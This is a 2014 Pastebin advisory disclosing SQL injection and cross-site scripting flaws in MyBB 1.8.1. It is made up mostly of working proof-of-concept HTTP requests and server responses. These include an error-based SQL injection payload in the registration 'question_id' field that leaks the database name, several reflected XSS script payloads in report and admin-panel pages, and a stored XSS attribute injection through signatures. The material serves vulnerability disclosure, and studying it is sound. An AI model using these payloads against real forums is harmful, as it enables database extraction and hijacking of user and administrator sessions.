daily pastebin goal
1%
SHARE
TWEET

Untitled

a guest Nov 13th, 2014 529 Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
  1. #Title: MyBB 1.8.X - Multiple Vulnerabilities
  2. #Date: 13.11.2014
  3. #Tested on: Linux / Apache 2.2 / PHP 5 (localhost)
  4. #Vendor: mybb.com
  5. #Version:  => 1.8.1 - Latest ATM
  6. #Contact: smash@devilteam.pl
  7. #Author: Smash_
  8.  
  9.  
  10. Latest MyBB forum software suffers on multiple vulnerabilities, including SQL Injection and Cross Site Scripting. Such bugs may allow attacker to perform remote sql queries against the database, and so on.
  11.  
  12. Sanitize your inputs ;)
  13.  
  14.  
  15. 1. SQL Injection
  16.  
  17. Vuln:
  18. POST 'question_id' - ID'+or+1+group+by+concat_ws(0x3a,database(),floor(rand(0)*2))+having+min(0)+or+1#
  19.  
  20. #1 - Request (question_id=C3yp9eM4wWlk1krjwiyxaXwqnCH9W8Om'+ORDER+BY+9#):
  21. POST /mybb-1.8.1/member.php HTTP/1.1
  22. Host: localhost
  23. Content-Type: application/x-www-form-urlencoded
  24. Content-Length: 408
  25.  
  26. regcheck1=&regcheck2=true&username=woot&password=random&password2=random&email=woot%40woot.com&email2=woot%40woot.com&referrername=&imagestring=6cj5n&imagehash=b2dee8e4028e9cad37e30c31753dfe01&answer=4&question_id=C3yp9eM4wWlk1krjwiyxaXwqnCH9W8Om'+ORDER+BY+9#&allownotices=1&receivepms=1&pmnotice=1&subscriptionmethod=0&timezoneoffset=0&dstcorrection=2&regtime=1415880544&step=registration&action=do_register
  27.  
  28. #1 - Response:
  29. HTTP/1.1 503 Service Temporarily Unavailable
  30. Date: Thu, 13 Nov 2014 15:16:02 GMT
  31.                 <div id="content">
  32.                         <h2>MyBB SQL Error</h2>
  33.  
  34.                         <div id="error">
  35.                                 <p>MyBB has experienced an internal SQL error and cannot continue.</p><dl>
  36. <dt>SQL Error:</dt>
  37. <dd>1054 - Unknown column '9' in 'order clause'</dd>
  38. <dt>Query:</dt>
  39.                         SELECT q.*, s.sid
  40.                         FROM mybb_questionsessions s
  41.                         LEFT JOIN mybb_questions q ON (q.qid=s.qid)
  42.                         WHERE q.active='1' AND s.sid='C3yp9eM4wWlk1krjwiyxaXwqnCH9W8Om' ORDER BY 9#'
  43.                 </dd>
  44.  
  45.  
  46. #2 - Request (question_id=-C3yp9eM4wWlk1krjwiyxaXwqnCH9W8Om'+ORDER+BY+8#):
  47. POST /mybb-1.8.1/member.php HTTP/1.1
  48. Host: localhost
  49. Content-Type: application/x-www-form-urlencoded
  50. Content-Length: 409
  51.  
  52. regcheck1=&regcheck2=true&username=woot&password=random&password2=random&email=woot%40woot.com&email2=woot%40woot.com&referrername=&imagestring=6cj5n&imagehash=b2dee8e4028e9cad37e30c31753dfe01&answer=4&question_id=-C3yp9eM4wWlk1krjwiyxaXwqnCH9W8Om'+ORDER+BY+8#&allownotices=1&receivepms=1&pmnotice=1&subscriptionmethod=0&timezoneoffset=0&dstcorrection=2&regtime=1415880544&step=registration&action=do_register
  53.  
  54. #2 - Response:
  55. HTTP/1.1 200 OK
  56. Date: Thu, 13 Nov 2014 15:21:15 GMT
  57. (...)
  58. <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><!-- start: member_register -->
  59. <html xml:lang="en" lang="en" xmlns="http://www.w3.org/1999/xhtml">
  60. <head>
  61. <title>Forums - Registration</title>
  62.  
  63.  
  64. #3 - Request (Final POC):
  65. POST /mybb-1.8.1/member.php HTTP/1.1
  66. Host: localhost
  67. Content-Type: application/x-www-form-urlencoded
  68. Content-Length: 475
  69.  
  70. regcheck1=&regcheck2=true&username=woot&password=random&password2=random&email=woot%40woot.com&email2=woot%40woot.com&referrername=&imagestring=6cj5n&imagehash=b2dee8e4028e9cad37e30c31753dfe01&answer=4&question_id=-C3yp9eM4wWlk1krjwiyxaXwqnCH9W8Om'+or+1+group+by+concat_ws(0x3a,database(),floor(rand(0)*2))+having+min(0)+or+1#&allownotices=1&receivepms=1&pmnotice=1&subscriptionmethod=0&timezoneoffset=0&dstcorrection=2&regtime=1415880544&step=registration&action=do_register
  71.  
  72. #3 - Response:
  73. HTTP/1.1 503 Service Temporarily Unavailable
  74. Date: Thu, 13 Nov 2014 15:24:34 GMT
  75. (...)
  76.                 <div id="content">
  77.                         <h2>MyBB SQL Error</h2>
  78.  
  79.                         <div id="error">
  80.                                 <p>MyBB has experienced an internal SQL error and cannot continue.</p><dl>
  81. <dt>SQL Error:</dt>
  82. <dd>1062 - Duplicate entry 'mybb:1' for key 'group_key'</dd>
  83. <dt>Query:</dt>
  84. <dd>
  85.                         SELECT q.*, s.sid
  86.                         FROM mybb_questionsessions s
  87.                         LEFT JOIN mybb_questions q ON (q.qid=s.qid)
  88.                         WHERE q.active='1' AND s.sid='-C3yp9eM4wWlk1krjwiyxaXwqnCH9W8Om' or 1 group by concat_ws(0x3a,database(),floor(rand(0)*2)) having min(0) or 1#'
  89.                 </dd>
  90. </dl>
  91. (...)
  92.  
  93.  
  94.  
  95. 2. Cross Site Scripting
  96.  
  97.  a) Reflected XSS - Report post
  98.  
  99. Vuln:
  100. GET 'type' - XSS"><script>alert(666)</script>
  101.  
  102. localhost/mybb-1.8.1/report.php?type=XSS%22%3E%3Cscript%3Ealert%28666%29%3C%2fscript%3E&pid=1
  103.  
  104. Request:
  105. GET /mybb-1.8.1/report.php?type=XSS%22%3E%3Cscript%3Ealert%28666%29%3C%2fscript%3E&pid=1 HTTP/1.1
  106. Host: localhost
  107.  
  108. Response:
  109. HTTP/1.1 200 OK
  110. Set-Cookie: sid=27ec1f0b75b3c6b9d852e6614144a452; path=/mybb-1.8.1/; HttpOnly
  111. Content-Length: 1247
  112. Content-Type: text/html
  113.  
  114. <div class="modal">
  115.   <div style="overflow-y: auto; max-height: 400px;" class="modal_0">
  116.   <form action="report.php" method="post" class="reportData_0" onsubmit="javascript: return Report.submitReport(0);">
  117. <input type="hidden" name="my_post_key" value="c08308117fcadae6609372f46fa97835" />
  118. <input type="hidden" name="action" value="do_report" />
  119. <input type="hidden" name="type" value="XSS"><script>alert(666)</script>" />
  120. <input type="hidden" name="pid" value="0" />
  121.  
  122.  
  123.  b) Stored XSS - Signature
  124.  
  125. Vuln:
  126. POST 'signature' - [video=youtube]http://youtube.com?"+xss="true"+666="[/video]
  127.  
  128. #1 - Request (change signature):
  129. POST /mybb-1.8.1/usercp.php HTTP/1.1
  130. Host: localhost
  131. Referer: http://localhost/mybb-1.8.1/usercp.php?action=editsig
  132. Content-Type: application/x-www-form-urlencoded
  133. Content-Length: 203
  134.  
  135. my_post_key=c08308117fcadae6609372f46fa97835&signature=%5Bvideo%3Dyoutube%5Dhttp%3A%2F%2Fyoutube.com%3F%22+xss%3D%22true%22+666%3D%22%5B%2Fvideo%5D&updateposts=0&action=do_editsig&submit=Update+Signature
  136.  
  137. #2 - Request (user's profile):
  138. GET /mybb-1.8.1/member.php?action=profile&uid=2 HTTP/1.1
  139. Host: localhost
  140. Referer: http://localhost/mybb-1.8.1/usercp.php?action=editsig
  141.  
  142. #2 - Response:
  143. HTTP/1.1 200 OK
  144. Set-Cookie: sid=e68f1b6fab0737d7057b546e24d8106e; path=/mybb-1.8.1/; HttpOnly
  145. Content-Length: 12740
  146. Content-Type: text/html; charset=UTF-8
  147. (...)
  148. <table border="0" cellspacing="0" cellpadding="5" class="tborder tfixed">
  149. <tr>
  150. <td class="thead"><strong>user's Signature</strong></td>
  151. </tr>
  152. <tr>
  153. <td class="trow1 scaleimages">[Video: <a href="http://youtube.com?" xss="true" 666="" target="_blank">http://youtube.com?" xss="true" 666="</a>]</td>
  154. </tr>
  155. </table>
  156. <br />
  157.  
  158.  
  159.  c) Reflected XSS - Templates (AP)
  160.  
  161. Vuln:
  162. GET 'title' - title"><script>alert(666)</script>
  163.  
  164. localhost/mybb-1.8.1/admin/index.php?module=style-templates&action=edit_template&title=calendar"><script>alert(666)</script>&sid=1&expand=1
  165.  
  166. Request:
  167. GET /mybb-1.8.1/admin/index.php?module=style-templates&action=edit_template&title=calendar%22%3E%3Cscript%3Ealert(666)%3C/script%3E&sid=1&expand=1 HTTP/1.1
  168. Host: localhost
  169.  
  170. Response:
  171. HTTP/1.1 200 OK
  172. (...)
  173. <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
  174. <html xmlns="http://www.w3.org/1999/xhtml">
  175. <head profile="http://gmpg.org/xfn/1">
  176.         <title>Editing Template: calendar"><script>alert(666)</script></title>
  177.  
  178.  
  179.  d) Reflected XSS - Languages (AP)
  180.  
  181. Vuln:
  182. GET 'file' - <a onmouseover=alert(666)>woot
  183.  
  184. localhost/mybb-1.8.1/admin/index.php?module=config-languages&action=edit&lang=english&editwith=&file=<a onmouseover=alert(666)>woot
  185.  
  186. Request:
  187. GET /mybb-1.8.1/admin/index.php?module=config-languages&action=edit&lang=english&editwith=&file=%3Ca%20onmouseover=alert(666)%3Ewoot HTTP/1.1
  188. Host: localhost
  189.  
  190. Response:
  191. HTTP/1.1 200 OK
  192. (...)
  193. <a href="index.php?module=config-languages">Languages</a> &raquo; <a href="index.php?module=config-languages&amp;action=edit&amp;lang=english">English (American)</a> &raquo; <span class="active"><a onmouseover=alert(666)>woot</span>
  194. (...)
  195. <div class="title"><a onmouseover=alert(666)>woot</div>
RAW Paste Data
We use cookies for various purposes including analytics. By continuing to use Pastebin, you agree to our use of cookies as described in the Cookies Policy. OK, I Understand
 
Top